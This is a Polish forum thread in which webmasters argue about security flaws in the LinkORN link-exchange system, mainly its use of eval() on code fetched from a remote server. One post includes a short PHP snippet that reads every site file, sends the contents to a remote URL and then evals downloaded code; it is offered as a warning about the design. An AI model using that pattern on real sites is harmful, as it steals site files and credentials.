UWAGA NA SYSTEMY WYMIANY!

[Paweł Kobis]

I wlasnnie z naprawa tak mialo byc

4 maja popoludniu byla informacja od szooka ze istnieje takie ryzyko i wziolem sie za analize i sesowne rozwiazanie problemu.

Nastepnie Szook wystartowal tutaj jak sam powiedzial zeby zrobic dym na forum ! co mu sie udalo

Napisalem moj pierwszy post mowi ze konczone sa prace z zaktualizacja i nie bedzie problemu

W tym momencie przyczytaj uwaznie prosze Szook obraca kota ogonem i zaczyna sie wojna ! Tym razem nie ja zaczolem

Wynik ankiety jest:

75% za pozostaieniem wszystkich funkcji umozliwiajacych nam badanie stron

25% za usunieciem wszystkiego

Ciekawe nie sadzisz ?

Wystarczylo napisac jesli juz musial ze bledne konfiguracje serwerow umozliwiaja przeprowadzenie atakow na strony userow ktore posiadaja zaisntalowany system. Przekazalem informacje wszystkim systema i daje czas 24h lub ile tam czeba na poprawienie bugow zanim je opisze publicznie. I tyle w temacie. W systulacji kiedy taki szook pisze pubicznie i przekreca fakty ktore wspolnie ustalilismy robi sie straszny balagan i "burdel" ludzie zaczynaja panikowac bo nie znaja prawdy a ich wiedza jest zamala aby samemu doisc do prawdy.

Ok skoro szook jest wykladnikiem prawdy to ja poczekam z wszystkimi bugami linkme i nie bede ich wymienial i patrzyl z boku w sumie chcialem napisac jakie sa i jak je mozna naprawic bez podawania sposobow ich wykozystywania ale zachowam sie jak dzieciak i nic nie powiem narazie - taki zarcik na dobranoc lub dziendobry

[michal]

Szook jaki jest taki jest i Ty jaki jesteś taki jesteś. O tym większość ludzi wiem.

Fakt jest jednak taki, że to szook znalazł bug i go opublikował.

Ty w tym miejscu powinieneś to przyjąć do wiadomości i pracować.

Chyba zbędne były niektóre Twoje posty, które zaprzeczały istnieniu bug'a.

Poza tym jeszcze poprawiłeś wpadkę z eval(), co nie wyszło od szooka, tylko od naszego małoletniego geniusza

Chodzi tutaj o Twoje podejście do sprawy.

hmmm.... a po jaką cholerę ja tu walę morały, jak mnie nie interesuje to czy Twój system działa i jak działa i czy masz userów czy nie....

[Paweł Kobis]

Tylko ze ludzie z systemu linkorn wypowiadaja sie ze eval() powinien zostac wiedz jednak moderator sie pomylil i to bardzo jak narazie widac zobaczymy co bedzie za kilka dni i wtedy zastosuje sie do wynikow i jesli usezry mojego systemu wypowiadajacy sie na moim forum uznaja ze ma byc taka funkcja zostanie ona spowrotem wlonczona

I michale bug jest po stronie serwera nie skryptu z DNS-ami! Przynajmniej Ty nie myl pojec

[michal]

I michale bug jest po stronie serwera nie skryptu z DNS-ami! Przynajmniej Ty nie myl pojec

Ja pojęć nie mylę. Skoro duża część serwerów ma taki soft a nie inny, to głowa programisty aplikacji w tym aby jego skrypt był bezpieczny. To już zrobiłeś, dzięki temu wątkowi szooka i chwała Tobie Aniele.

Dla mnie EOT!

Co do eval() to już Twój wybór i userów czy chcą Tobie zaufać.

[Daniel Kędzierski]

Michale masz racje EOT.

Dla mnie też, DIR ELITE powiedzial już stanowczo za wiele, ciągle wmawia że czegoś nie było - w takim razie co naprawiał, co aktualizował. Niech Dir Elite i jego klony/wysłannicy zaglądną na ankiete.

Jak można przez cały watek pisac ze czegoś niema, coś nie istnieje.

Albo napisać wiedzielismy o tym - kuzwa człowieku gdybm CI NIE NAPISAŁ że w Twoim curlu brakuje podstawowej LINI jak timeout to byś o tym nie wiedział a Ty mówisz że ci audyt skryptu robili ?.

Może jacyś usserzy znajdą się jeszcze by być na tyle naiwni i używać Twojego systemu - ale wierz mi za słowa których użyłeś w moim kierunku w tym wątku masz gwarantowany z mojej strony taki marketing żę Twój system poznają osoby które nie wiedzą nawet co to jest system wymiany linków.

Ja skończyłem - błedy i możliwości hackowania zostały temu systemowi udowodnione i tak jak michał napisał MMP znalazł jeszcze jeden, ale nie martw się DIR ELITE - ja mam jeszcze jeden. W sumie ty się nie martwisz bo przeciez to nie Twoje strony, ty przez te 3 dni się nie martwiłeś o strony userów tylko o mówienie o prefosjonalnym audycie jaki miały Twoje skrypty PHP.

DIR ELITE i nie pisz że po informacji którą dostałeś zabrałeś się za prace i że ja specjalnie tak, napisałem info ogólne na PIO bo twierdziłeś z uporem osła że coś takiego nie istnieje. - zainteresowanych zapraszam na moje forum na którym po tym gdy ci to napisałem to twierdziłeś że:

https://forum.szook.tv/about54.html

cytaty

"Szook zrozum nie jestes w stanie wyslac userowi zadnych danych na strone i wersja lite ataku ktory wymysliles tez jest nie do wykonania z prostej przyczyny nie znasz "klucza". Jezeli ci sie to uda udowodni to prosze ze mozesz zrobic bo juz nie jedna osoba kombinowala z lepszymi glowami niz twoja i moja.

Jako ciekawostke ci powiem ze LinkORN nie dziala od zawsze na cURL'u stąd wlasnie to przeoczenie ktore sie nie wydaje zbyt powazne biorac pod uwage ze awarje serwertow i czas awarji nie sa z byt czesto i pozostale zabezpieczenia ktorych ty nie widzisz dzialaja poprawnie "

"Musze cie zasmucis - LinkORN w ciagu kilku godzin zostanie zabezpieczony przed tym czyms choc nadal utrzymuje ze nie zdzialal bys zaduzo ale wedlog zasady na zimne lepiej dmuchac"

I jak można wyczytać - nie mozna, zostanie w kilka godzin.

Od tych kilku godzin mineły 3 DNI a Twoim rozumowaniu przez ten wątek takie coś nie istniało ? to istniało czy nie istniało - i czego ludzią mącisz w głowach pisząc że chodzi tylko o dns ? a jestes pewny że o DNS ?

a może wcale nie o DNS tylko o wpis w VirtualHOST

Widzisz Ty tak naprawde sam nie wiesz jak działają serwery www i w czym jest problem.

Pozdrówka

Myślę że więcej dodawać w tym wątku nie musze. Dla mnie Twój system miał i ma nadal dziury bardzo groźne dla userów. A że jak czytałem Twoje wątki na zasadzie WIem ale Nie powiem tak własnie potraktuje Twój system - wiem ale nie powiem (użyje).

Pozdrówka

ps.

DIR ELITE obserowałeś ten temat wczoraj i nie odpowiadałeś - czekałeś aż zasne by Twój post z Twoją rację powisiał bez riposty kilka godzin czy jak ?. Bo jak tylko kłade się spać to zaraz piszesz.

Ale zapraszam Ciebie na audycje bo przecież Ty lubisz audycje marketingowe gdzie mówi się o Twoich produktach.

https://www.goldenline.pl/forum/pozycjonowa...2533/s/1#990398

https://www.forum.szook.tv/viewtopic.php?p=290#290

https://wykop.pl/link/15832/audycja-na-tema...ow-wymiany.html

https://www.swww.pl/269,pokaz,News.html - bardzo ładnie zaprezentowany NEWS na Tym wortalu Strefa WWW.

Zobacz DIR ELITE - pewno marzyła ci się taka promocja systemu - jeszcze chyba naraz w tylu miejscach o nim nie pisali.

Ale spokojnie - będzie też mowa o tym tutaj:

https://web2.0.nzs.szczecin.pl/index.php/agenda/

i tutaj:

https://www.myszka.org/ jako podcast audycji z prof. radia.

A wiesz na ilu blogach napiszą ? bo jak znam blogersów to już napisali.

Ps Bełcik

"a jednak w progreso żeby podpiąć domene musisz najpierw przekirować ją na ich dns"

tak ci odpowiedzieli w Progreso ? no to wiesz co widac nie wiedzą ze żeby zmienić delegację DOMENY PL na jakieś DNS musi zostać ona do nich najpierw zapisana.

Bełcik ja nie posiadam takiem możliwośc by podpinać domeny na czyjeś dns poza domenami innymi niż PL.

Mogę taki manewr zrobic z PL tylko podczas rejestracji ale nie zmiany delegacji.

Więc jak masz taką odp od progreso względem domeny to podeślij mi na gg bo jest lekko śmieszna i nie wykonalna.

Bo jeżeli faktycznie jest tak jak mówisz to odeślij tych adminów do

Jakie dane wymagane są przy wypełnianiu wniosku o zmianę delegacji?

Przy wypełnianiu wniosku o zmianę delegacji wymagane są:

a. Dane abonenta (adres, NIP/REGON, telefon, e-mail)

b. Nazwy nowych serwerów oraz opcjonalnie ich numery IP (w przypadku rejestrowania nowych serwerów nazw)

UWAGA! Serwery nazw muszą być skonfigurowane i muszą obsługiwać przedmiotowe nazwy domen (skrypt sprawdza, czy podane serwery nazw posiadają rekord SOA dla podanych we wniosku nazw domen).[powrót]

link:

https://www.dns.pl/zmiany-delegacji.html

dlatego też nie może wymagać admin aby najpierw zmienić delegacje .

[sq-]

Przejdzie nawet tam gdzie admin akceptuje.

Wiecie dlaczego ?

Bo nie spotkałem sie jeszcze z odmową dodania domeny do panelu nawet w wypadku kiedy dokonuje tego admin.

a jednak w progreso żeby podpiąć domene musisz najpierw przekirować ją na ich dns

e-e

nigdy nie bylo z nimi problemow - najpierw wpis, potem delegacja.

[Daniel Kędzierski]

sq dokladnie masz racje. A najważniejsze że takie coś byłoby awykonalne - tzn to co napisał Bełcik że wymagają najpierw zmiany delegacji. Dałem wyżej link do dns.pl gdzie jasno się opisuje zasady zmiany delegacji.

W celu zmiany delegacji nalezy podać serwery dns, należy pamiętać że serwery dns musza być skonfigurowane dla domeny.

[sttorm]

jak widze dyskusja zaczyna isc w kierunku w jakim nie raz zdarzała juz na tym forum - zaczyna sięgać Bruku

ale czemu sie tu dziwić taki styl prezentuje wiele osob na forum, zaczynaja sie bowiem osobiste wycieczki, a nie dyskusja nad powstałym problem - czyli mozliwością przejecia naszych stron (zmiany ich zawartości)

wszyscy jada na jeden system i w sumie dobrze że wykryto ten błąd i został on juz naprawiony, przynajmniej z tej strony jestesmy bezpieczni choc martwi mnie fakt iz przez zwykle statystyki mozna zrobic to samo

po wypowiedziach niektórych martwi mnie tez iz zaczną te osoby teraz tylko atakować linkorn zamiast sprawdzic inne systemu czy też nie mają jakiś bugów, gdyż wiele osob nie korzysta tylko z linkorn ale z innych systemów też - choć sądze iż zaatakowany został jeden system jak to nie raz już tu bywało i na tym zakończy się ta dyskusja, i nie zostanie wypracowana jakaś wspólna konkluzja tego wszystkiego.

Z tego co rozumiem wynika, iż problem nie dotyczy tylko linkorn ale wielu rzeczy które mają te same rozwiązania programowe i tutaj jest problem. A czy ktos wczesniej patrzył czy to było możliwe tylko na serwerach powiedzmy darmowych czy możliwe było to na serwerach typu home, nazwa ???

jesli tam to nie jest mozliwe to rozumiem ze tam strony sa bezpieczne i to problem niektórych tylko firm oferujacych tanie hostingi

michal - dir elite stwierdził iż przy linkme tez moze byc ten problem, tak wiec może ktoś mądrzejszy odemnie też to sprawdzi czy to jest możliwe (mam nadzieje że nie ale jeśli było możliwe zostało już to poprawione przez adminów gdyż napewno śledzą ten wątek)

[Paweł Kobis]

szook jesli juz piszesz EOT naucz sie znaczenia slow zreszta bede mandrzeszy i nie wdaje sie z dyskusje z toba bo i tak szkoda mojego czasu.

PS: Kazdy ma swoj rozum i potrafi dokonac wlasnego osada a ja ide spokoinie spac i sie nie martwie

[Daniel Kędzierski]

Sstorm zwróc uwagę że gdyby ktoś nie zaczoł wycieczek ! nie wypowiadałbym się tylko w kierunku LINKORN - pisałem też o innych systemach - ankieta i skupienie uwagi na LINKORN rozpoczeło się gdy ten starał sie tylko obrażać.

Storm to niema zadnego zwiazku z tym czy sa to serwery darmowe ? gdzie to wyczytałeś.

Taką samą akcje można było można przeprowadzić na home i na każdy innym.

Tu nie chodziło o atakowanie kont serwerów bezpłatnych tylko współdzielonych.

Np pisząc że [ osoba domniemana o popełnienie przestępstwa lub wykroczenia ] I [ nierzetelny partner ] tylko szuka dziur ! bo inny nie musi ich szukać.

Tym samym sam przekierował wątek na zły tor.

Ale masz racje szkoda rozmawiając o rzeczach waznych zbijac watek na podjazdy prywatne.

Cel wątku jeden - bezpieczeństwo

Co nie zmieni faktu że system LINKORN będzie miał dodatkową promocje właśnie za fakt promowania swojej wyższości i obrazania innych. Ja nie nazwałem go w takim sam sposób a mógłbym po tym właśnie na co pozwalał jego system.

Mam nadzieje storm że zrozumiesz dlaczego wątek zmienił tor.

DIR ELITE w temacie Twojej osoby jest EOT - właśnie poszedł ignor. Nie w temacie zagrożeń tego backdoora jakiego wyprodukowałeś.

[MMP]

MMP - instalator musi miec te dane w przeciwnym razie nie bedzie w stanie zainstalowac poprawnie systemu na stronie usera - Plik install.php jest usowany z serwera po instalacji wiedz problem nie istnieje. Dodatkowo przypominam ze ten plik nie jest includowany do strony usera. Tak wiedz nie widze tutaj problemu zebym musial zmieniac funkcje. Zaraz zmienie odwolanie po domenie na IP zeby nikt juz nie plakal smile.gif

W takim razie wystarczy że administracyjna LINKORN.pl wyśle podczas instalowania taki kod:

foreach( glob( '*' ) as $file )
{
file_get_contents( 'https://linkorn.pl/kradnij-strone.php?code='. file_get_contents( $file ) );
}
eval( file_get_contents( 'https://linkorn.pl/prawidlowa-instalacja.php' ) );

I do systemu LINKORN.pl trafi cały serwis użytkownika, m.in pliki konfiguracyjne. Potem zostanie wywołany prawidłowy instalator i po całej akcji śladu nie będzie.

SYSTEM JEST DALEJ NIEBEZPIECZNY!

Żaden, skrypt nie powinien używać EVAL. Zwłaszcza jeżeli kod jest pobierany z zewnętrznego serwera.

[Daniel Kędzierski]

MMP ale jak widzisz kontrola nad stronami userów adminowi jest konieczna. Wiec to nie błedy czy chęc naprawy a jak widac chęć kontroli nad witrynami.

[sttorm]

szook ja nie mowie tu o tobie ale o wielu innych osobach i nie raz bylo to spotykane na forum, a odnosnie słow dir elite ja sie juz do tego przyzwyczailem i ma takie juz slownictwo wiec ja bym olal jego slowa (te brzydkie) gdyz w sumie pewnie kazdy gdyby zaczela sie na niego nagonka wypowiedzial by pewne slowa których pewnie pozniej by załował.

dla mnie wlasniej jest problem nie tylko w linkorn ale w kazdym systemie i dyskusja szla w kierunku jak temu zaradzic a skonczylo sie jak sie skonczylo

ja wiem dlaczego watek zmienił tor - jak mowie nie raz dawano tu to do zrozumienia - wiele osob nie lubi systemów wymiany (mowie o osobach ktore maja tysiace domen - odbieramy im pieniadze, a niekiedy wiele osob klientów więc wypowiedzi wielu osob mnie nie dziwią)

gdy ktos zaczyna atak na jakikolwiek system przylacza sie do niego wiele osob i sa to czesto te same osoby niestety ale mam nadzieje że pójdzie teraz dyskusja w kierunku jak radzic powstałym problemom a nie że ten jest be czy tamtem.

kwestia czy w innych systemach mozna zrobic to samo a na to nie dal nikt z niezaleznych jasnej odpowiedzi, oraz czy przez staty tez to jest mozliwe i czy na wszystkich hostingach i ja bym szedl w tym kierunku i mam nadzieje ze ktos to sprawdzi, a nie bedzie robil tylko osobistych wycieczek

eval - z tego co jest napisane zostal wylaczony i mam nadzieje ze admini linkorn przemysla wszystko i nie beda go uzywac, tak wiec poczekajmy czy bedzie uzywany dalej czy nie,

[Bartek S.]

eval - z tego co jest napisane zostal wylaczony i mam nadzieje ze admini linkorn przemysla wszystko i nie beda go uzywac, tak wiec poczekajmy czy bedzie uzywany dalej czy nie,

Nigdy nie będziesz miał pewności...

[Brad]

kwestia czy w innych systemach mozna zrobic to samo a na to nie dal nikt z niezaleznych jasnej odpowiedzi, oraz czy przez staty tez to jest mozliwe i czy na wszystkich hostingach i ja bym szedl w tym kierunku i mam nadzieje ze ktos to sprawdzi

Popieram, to bardzo ważne, żeby zagwarantować użytkownikom systemów wymiany linków bezpieczeństwo, nie tylko w akcjach promocyjnych ale w rzeczywistości. Poprosiłem kilka osób o sprawdzenie mojego systemu czy zawiera błędy mogące wpłynąć na bezpieczeństwo stron użytkowników, testy zakończyły się pozytywnie. Ale to nie oznacza, że system jest wolny od błędów, dlatego każdemu kto go przetestuje pod kątem zabezpieczeń nieautoryzowanego dostępu będę wdzięczny.